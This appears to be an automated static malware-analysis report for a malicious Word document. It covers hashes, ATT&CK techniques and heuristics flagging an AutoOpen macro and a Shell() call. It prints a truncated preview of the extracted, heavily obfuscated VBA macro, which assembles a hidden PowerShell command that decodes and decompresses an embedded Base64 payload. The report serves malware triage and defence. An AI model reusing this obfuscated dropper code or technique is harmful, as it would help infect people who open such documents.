Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f382a5df0a955a42…

MALICIOUS

Office (OLE)

117.5 KB Created: 2018-05-23 19:14:00 Authoring application: Microsoft Office Word First seen: 2018-06-14
MD5: b7e9741450b9d7ee2b0ca03919e97962 SHA-1: a38f5f24628e7a7f3390126006581e7fed6667e2 SHA-256: f382a5df0a955a420442f8b26ecf0a1f1fa93da5a2fbe124cc6739e99547b724
144 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The AutoOpen macro triggers a Shell() call, which is highly suspicious. The extracted VBA script attempts to construct and execute a PowerShell command, likely to download and execute a second-stage payload. The obfuscated nature of the script and the use of Shell() indicate a downloader or droppper functionality.

Heuristics 6

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 86038 bytes
SHA-256: 5488a9cae3973bf74d50e3c0723b05aaba5c5a98938741577294efa1f74a75ae
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "tMJnBCi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function pwOUoRwHr()

On Error Resume Next
aFmnWdhaUq = ADlEOnuAb + CSng(878965) + 805953 / Sin(737606 - CByte(978844) / 499741 - Round(878965)) + SZBdJKzwH * WPEmPpjXMEY - (805953 + 737606 + 978844 - 8789650)
Set EoGdC = HtbbQE
UaaNKIiHcH = "AxJxiDSFfilZjdeLwsTyU2N8CFe -WinDoiRowershell mdXpdaUdu7ZAkS14IHG0e4u"
QUTEtQYK = CStr(Left(Right(UaaNKIiHcH, 33), 10)) + Left(Right(UaaNKIiHcH, 41), 6) + Left(Right(UaaNKIiHcH, 53), 4) + Left(Right(UaaNKIiHcH, 59), 1) + Left(Right(UaaNKIiHcH, 43), 2)

wQwlLY = "mPVAHMhidden  ( NLu3aEcT soY18ytySZ3w4vo9B6im8few-oBJuLFfsxO MqgVn"
ZLYqBv = Left(Right(wQwlLY, 60), 11) + Left(Right(wQwlLY, 19), 6) + Left(Right(wQwlLY, 45), 4) + Left(Right(wQwlLY, 6), 1)

lkdljiRBc = "yvmPsYstem.IODngamrLu3aXkcCsoY18ytyS.STREo9B6im8fS6"
IhSWAEoz = Left(Right(lkdljiRBc, 47), 9) + Left(Right(lkdljiRBc, 15), 5) + Left(Right(lkdljiRBc, 35), 3)

ZBTGKMKU = "yvmeAdeR(rewhDngPBNLu3aX( NsoY18y"
ZQElafvYP = CStr(Left(Right(ZBTGKMKU, 30), 6)) + CStr(Left(Right(ZBTGKMKU, 9), 3)) + CStr(Left(Right(ZBTGKMKU, 23), 2))

XjwilXj = "mPVAHMvroTh-oBJEcT IO.coMpRessytySZ3wSTreaM(m8fS6rTNQuLFfsxOXMqgVnFL6LFJQ6uPQ1q4DMRioN.DEfLaTeGmKQDysJLlcA [0vpd2tBBu"
LoSkJnA = Left(Right(XjwilXj, 106), 19) + Left(Right(XjwilXj, 34), 11) + Left(Right(XjwilXj, 80), 7) + CStr(Left(Right(XjwilXj, 11), 2))

iFBnE = "yvmPiO.MeMOrhDnAm]NLu3aXkcCsoY18ytySTrE4vo9B6im8"
SYGzrqi = Left(Right(iFBnE, 44), 8) + CStr(Left(Right(iFBnE, 14), 5)) + Left(Right(iFBnE, 33), 3)
nqzIjziVb = bZODPKkSr + CSng(109106) + 475429 / Sin(215154 - CByte(624279) / 377383 - Round(109106)) + fUwQKT * mYHFWLHu - (475429 + 215154 + 624279 - 1091060)
Set WCWYcLr = raFVUjjijV
ojcqhiZhvGi = "mPVAHMvr[CoNVErT]::FROmcCsoY1InG( '3w4vo9B6im8fS6rTNQuLFfsxOXMqgVnBAse64stRPQ1q4DMR9fZT37KO36"
QozHPwS = Left(Right(ojcqhiZhvGi, 85), 15) + Left(Right(ojcqhiZhvGi, 27), 9) + Left(Right(ojcqhiZhvGi, 64), 6) + CStr(Left(Right(ojcqhiZhvGi, 8), 1))

YBDPONAhDv = "yvmPVVbT9tKEhDvkPBNLu3aXkcCsoY18H4/0Z3w4vo9B6"
OtNAX = CStr(Left(Right(YBDPONAhDv, 41), 8)) + CStr(Left(Right(YBDPONAhDv, 13), 4)) + Left(Right(YBDPONAhDv, 31), 3)

qZYTYOPXOY = "yvVnWE7MvEtThDngPBNLuZL4kcCsoY"
IltkjLP = Left(Right(qZYTYOPXOY, 28), 5) + CStr(Left(Right(qZYTYOPXOY, 9), 3)) + Left(Right(qZYTYOPXOY, 21), 2)

iLMCGPPHRJ = Chr(43)
GmtKOnitWX = "mPVAHMvJkEgDpZEaLJEWaXkcCN8GJEytySZ3w4vo9B6im8fS6rTNQuLFfmiAeHMcBnFL6LFJQ6nPQ1q4D"
bGwvKwqS = Left(Right(GmtKOnitWX, 74), 13) + CStr(Left(Right(GmtKOnitWX, 24), 8)) + Left(Right(GmtKOnitWX, 56), 5) + Left(Right(GmtKOnitWX, 7), 1)
CqHcDawKLp = lqslAZzkI + CSng(254400) + 530029 / Sin(883296 - CByte(372612) / 268405 - Round(254400)) + BpWFiwWbmH * lwPndd - (530029 + 883296 + 372612 - 2544000)
Set BzJCkB = kkTikqKE
ClYqiOkl = "yMpVV7HMvroTv7ngPB"
WYwINW = Left(Right(ClYqiOkl, 17), 3) + Left(Right(ClYqiOkl, 6), 2) + CStr(Left(Right(ClYqiOkl, 13), 1))

NLOjzj = Chr(43)
qEANW = "mPVAHWa94xSwtJqBNLu/LNkcCsoY18ytySZ3w4vo9BLZ2d356rTNQugFfsxO"
zfztK = Left(Right(qEANW, 55), 10) + CStr(Left(Right(qEANW, 18), 6)) + CStr(Left(Right(qEANW, 41), 3)) + Left(Right(qEANW, 6), 1)

lYzXLI = "yvmabdnZXtoTh0JtPBNLu3aXkcCsoYq95mySZ3w4vo"
zdbbSprcbSH = Left(Right(lYzXLI, 39), 7) + CStr(Left(Right(lYzXLI, 12), 4)) + Left(Right(lYzXLI, 29), 3)

IRUDnKz = Chr(43)
qTQQROT = "yvzxT1H2vroThDngP83Cu3aX"
lvtYzjW = CStr(Left(Right(qTQQROT, 22), 4)) + CStr(Left(Right(qTQQROT, 7), 3)) + CStr(Left(Right(qTQQROT, 17), 1))

CtmNbUQ = Chr(43)
RmpYoAosaBv = "mPVAHMvroTazqxkVveHbjtGy71bl18ytySZU37VDnO6im8fS6rTNQuLFfsxOXMqgVnFL6LFJQ6uPQ1qt/14NClXVNKO36WGmKQDysrulcAwJ0vp"
zWqXihmsHL = Left(Right(RmpYoAosaBv, 101), 18) + Left(Right(RmpYoAosaBv, 32), 10) + CStr(Left(Right(RmpYoAosaBv, 76), 7)) + Left(Right(RmpYoAosaBv, 10), 2)
toAbGQTbpEI = RnrIj + CSng(922192) + 843582 / Sin(740701 - CByte(878191) /
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.